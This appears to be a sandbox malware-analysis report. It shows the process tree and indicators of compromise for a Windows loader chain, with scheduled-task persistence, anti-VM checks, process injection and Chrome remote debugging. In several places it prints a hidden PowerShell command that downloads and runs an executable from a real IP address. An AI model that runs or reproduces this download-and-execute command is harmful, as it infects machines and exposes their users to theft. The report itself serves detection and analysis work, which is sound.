pid Process 4804 f6860e04c99e9e38430b00d86e75bb2c.exe 4804 f6860e04c99e9e38430b00d86e75bb2c.exe 4804 f6860e04c99e9e38430b00d86e75bb2c.exe 964 28bc9d64cc.exe 964 28bc9d64cc.exe 964 28bc9d64cc.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe 3868 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2352 OEHBOHk.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4804 wrote to memory of 4020 4804 f6860e04c99e9e38430b00d86e75bb2c.exe 87 PID 4804 wrote to memory of 4020 4804 f6860e04c99e9e38430b00d86e75bb2c.exe 87 PID 4804 wrote to memory of 4020 4804 f6860e04c99e9e38430b00d86e75bb2c.exe 87 PID 4804 wrote to memory of 4448 4804 f6860e04c99e9e38430b00d86e75bb2c.exe 88 PID 4804 wrote to memory of 4448 4804 f6860e04c99e9e38430b00d86e75bb2c.exe 88 PID 4804 wrote to memory of 4448 4804 f6860e04c99e9e38430b00d86e75bb2c.exe 88 PID 4020 wrote to memory of 836 4020 cmd.exe 90 PID 4020 wrote to memory of 836 4020 cmd.exe 90 PID 4020 wrote to memory of 836 4020 cmd.exe 90 PID 4448 wrote to memory of 5052 4448 mshta.exe 91 PID 4448 wrote to memory of 5052 4448 mshta.exe 91 PID 4448 wrote to memory of 5052 4448 mshta.exe 91 PID 5052 wrote to memory of 2388 5052 powershell.exe 97 PID 5052 wrote to memory of 2388 5052 powershell.exe 97 PID 5052 wrote to memory of 2388 5052 powershell.exe 97 PID 2388 wrote to memory of 3004 2388 Temp53MXFYGZAQDCZJQGIQ55QX1IWOX3RJ9X.EXE 99 PID 2388 wrote to memory of 3004 2388 Temp53MXFYGZAQDCZJQGIQ55QX1IWOX3RJ9X.EXE 99 PID 2388 wrote to memory of 3004 2388 Temp53MXFYGZAQDCZJQGIQ55QX1IWOX3RJ9X.EXE 99 PID 3004 wrote to memory of 964 3004 rapes.exe 103 PID 3004 wrote to memory of 964 3004 rapes.exe 103 PID 3004 wrote to memory of 964 3004 rapes.exe 103 PID 964 wrote to memory of 1500 964 28bc9d64cc.exe 104 PID 964 wrote to memory of 1500 964 28bc9d64cc.exe 104 PID 964 wrote to memory of 1500 964 28bc9d64cc.exe 104 PID 964 wrote to memory of 532 964 28bc9d64cc.exe 105 PID 964 wrote to memory of 532 964 28bc9d64cc.exe 105 PID 964 wrote to memory of 532 964 28bc9d64cc.exe 105 PID 1500 wrote to memory of 3988 1500 cmd.exe 107 PID 1500 wrote to memory of 3988 1500 cmd.exe 107 PID 1500 wrote to memory of 3988 1500 cmd.exe 107 PID 532 wrote to memory of 1184 532 mshta.exe 108 PID 532 wrote to memory of 1184 532 mshta.exe 108 PID 532 wrote to memory of 1184 532 mshta.exe 108 PID 3004 wrote to memory of 732 3004 rapes.exe 110 PID 3004 wrote to memory of 732 3004 rapes.exe 110 PID 3004 wrote to memory of 732 3004 rapes.exe 110 PID 732 wrote to memory of 1016 732 cmd.exe 112 PID 732 wrote to memory of 1016 732 cmd.exe 112 PID 732 wrote to memory of 1016 732 cmd.exe 112 PID 732 wrote to memory of 4900 732 cmd.exe 113 PID 732 wrote to memory of 4900 732 cmd.exe 113 PID 732 wrote to memory of 4900 732 cmd.exe 113 PID 4900 wrote to memory of 4496 4900 cmd.exe 114 PID 4900 wrote to memory of 4496 4900 cmd.exe 114 PID 4900 wrote to memory of 4496 4900 cmd.exe 114 PID 732 wrote to memory of 4888 732 cmd.exe 115 PID 732 wrote to memory of 4888 732 cmd.exe 115 PID 732 wrote to memory of 4888 732 cmd.exe 115 PID 4888 wrote to memory of 2388 4888 cmd.exe 116 PID 4888 wrote to memory of 2388 4888 cmd.exe 116 PID 4888 wrote to memory of 2388 4888 cmd.exe 116 PID 732 wrote to memory of 1224 732 cmd.exe 117 PID 732 wrote to memory of 1224 732 cmd.exe 117 PID 732 wrote to memory of 1224 732 cmd.exe 117 PID 1224 wrote to memory of 2344 1224 cmd.exe 118 PID 1224 wrote to memory of 2344 1224 cmd.exe 118 PID 1224 wrote to memory of 2344 1224 cmd.exe 118 PID 732 wrote to memory of 4396 732 cmd.exe 119 PID 732 wrote to memory of 4396 732 cmd.exe 119 PID 732 wrote to memory of 4396 732 cmd.exe 119 PID 732 wrote to memory of 4392 732 cmd.exe 120 PID 732 wrote to memory of 4392 732 cmd.exe 120 PID 732 wrote to memory of 4392 732 cmd.exe 120 PID 4392 wrote to memory of 3636 4392 mshta.exe 121 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\f6860e04c99e9e38430b00d86e75bb2c.exe"C:\Users\Admin\AppData\Local\Temp\f6860e04c99e9e38430b00d86e75bb2c.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 7peafmaiaHQ /tr "mshta C:\Users\Admin\AppData\Local\Temp\5uoUfyY2R.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 7peafmaiaHQ /tr "mshta C:\Users\Admin\AppData\Local\Temp\5uoUfyY2R.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:836
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\5uoUfyY2R.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'53MXFYGZAQDCZJQGIQ55QX1IWOX3RJ9X.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Users\Admin\AppData\Local\Temp53MXFYGZAQDCZJQGIQ55QX1IWOX3RJ9X.EXE"C:\Users\Admin\AppData\Local\Temp53MXFYGZAQDCZJQGIQ55QX1IWOX3RJ9X.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Users\Admin\AppData\Local\Temp\10099760101\28bc9d64cc.exe"C:\Users\Admin\AppData\Local\Temp\10099760101\28bc9d64cc.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn qgadGmaLdj8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\oKkAZea2s.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn qgadGmaLdj8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\oKkAZea2s.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3988
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\oKkAZea2s.hta7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'0B3ZLRTJ5LRU1ZMX1YSW1ZTGSWGYPOR4.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1184 -
C:\Users\Admin\AppData\Local\Temp0B3ZLRTJ5LRU1ZMX1YSW1ZTGSWGYPOR4.EXE"C:\Users\Admin\AppData\Local\Temp0B3ZLRTJ5LRU1ZMX1YSW1ZTGSWGYPOR4.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:740
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10099770121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:732 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1016
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4496
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2388
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "X2Td3maDMRc" /tr "mshta \"C:\Temp\EBi34P1oY.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4396
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\EBi34P1oY.hta"7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4392 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3636 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:836
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10100160101\0781f1c15c.exe"C:\Users\Admin\AppData\Local\Temp\10100160101\0781f1c15c.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4816 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:4920
-
-
-
C:\Users\Admin\AppData\Local\Temp\10100170101\ce2f96f45b.exe"C:\Users\Admin\AppData\Local\Temp\10100170101\ce2f96f45b.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3376 -
C:\Users\Admin\AppData\Local\Temp\10100170101\ce2f96f45b.exe"C:\Users\Admin\AppData\Local\Temp\10100170101\ce2f96f45b.exe"7⤵
- Executes dropped EXE
PID:4756
-
-
C:\Users\Admin\AppData\Local\Temp\10100170101\ce2f96f45b.exe"C:\Users\Admin\AppData\Local\Temp\10100170101\ce2f96f45b.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:868
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3376 -s 8007⤵
- Program crash
PID:4860
-
-
-
C:\Users\Admin\AppData\Local\Temp\10100180101\9684a95687.exe"C:\Users\Admin\AppData\Local\Temp\10100180101\9684a95687.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1880
-
-
C:\Users\Admin\AppData\Local\Temp\10100190101\3a808e3c99.exe"C:\Users\Admin\AppData\Local\Temp\10100190101\3a808e3c99.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2312
-
-
C:\Users\Admin\AppData\Local\Temp\10100200101\12c607b539.exe"C:\Users\Admin\AppData\Local\Temp\10100200101\12c607b539.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:716 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:1188
-
-
-
C:\Users\Admin\AppData\Local\Temp\10100210101\z3SJkC5.exe"C:\Users\Admin\AppData\Local\Temp\10100210101\z3SJkC5.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3960 -
C:\Windows\TEMP\{A56521B1-A267-4453-848B-69D7E80C1DC8}\.cr\z3SJkC5.exe"C:\Windows\TEMP\{A56521B1-A267-4453-848B-69D7E80C1DC8}\.cr\z3SJkC5.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10100210101\z3SJkC5.exe" -burn.filehandle.attached=660 -burn.filehandle.self=7167⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:828 -
C:\Windows\TEMP\{D0A823F0-125A-43CF-824A-00FD1C31C42E}\.ba\WiseTurbo.exeC:\Windows\TEMP\{D0A823F0-125A-43CF-824A-00FD1C31C42E}\.ba\WiseTurbo.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5076 -
C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exeC:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3432 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe10⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2280 -
C:\Users\Admin\AppData\Local\Temp\WatcherUpdate_test.exeC:\Users\Admin\AppData\Local\Temp\WatcherUpdate_test.exe11⤵
- Loads dropped DLL
PID:3032 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"12⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3868 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe5bb046f8,0x7ffe5bb04708,0x7ffe5bb0471813⤵PID:2956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,4659392904471313588,9801916277721240524,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:213⤵PID:5424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,4659392904471313588,9801916277721240524,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 /prefetch:313⤵PID:5728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,4659392904471313588,9801916277721240524,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:813⤵PID:1716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4659392904471313588,9801916277721240524,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:113⤵PID:5428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4659392904471313588,9801916277721240524,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:113⤵PID:5220
-
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 7488⤵
- Program crash
PID:4172
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 6528⤵
- Program crash
PID:3776
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10100220101\BXxKvLN.exe"C:\Users\Admin\AppData\Local\Temp\10100220101\BXxKvLN.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:836
-
-
C:\Users\Admin\AppData\Local\Temp\10100230101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10100230101\mAtJWNv.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4352 -
C:\Users\Admin\AppData\Local\Temp\10100230101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10100230101\mAtJWNv.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:1904 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"8⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4608 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe6489cc40,0x7ffe6489cc4c,0x7ffe6489cc589⤵PID:2512
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1932,i,11966040274549623697,1829115365031806163,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1928 /prefetch:29⤵PID:4208
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2172,i,11966040274549623697,1829115365031806163,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2180 /prefetch:39⤵PID:1856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2256,i,11966040274549623697,1829115365031806163,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2264 /prefetch:89⤵PID:4736
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,11966040274549623697,1829115365031806163,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3176 /prefetch:19⤵
- Uses browser remote debugging
PID:1536
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3416,i,11966040274549623697,1829115365031806163,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3196 /prefetch:19⤵
- Uses browser remote debugging
PID:4276
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3620,i,11966040274549623697,1829115365031806163,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4468 /prefetch:19⤵
- Uses browser remote debugging
PID:5144
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4612,i,11966040274549623697,1829115365031806163,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4696 /prefetch:89⤵PID:5172
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4752,i,11966040274549623697,1829115365031806163,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4768 /prefetch:89⤵PID:5188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4588,i,11966040274549623697,1829115365031806163,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4680 /prefetch:89⤵PID:5480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4796,i,11966040274549623697,1829115365031806163,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4768 /prefetch:89⤵PID:5540
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4680,i,11966040274549623697,1829115365031806163,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5168 /prefetch:89⤵PID:5712
-
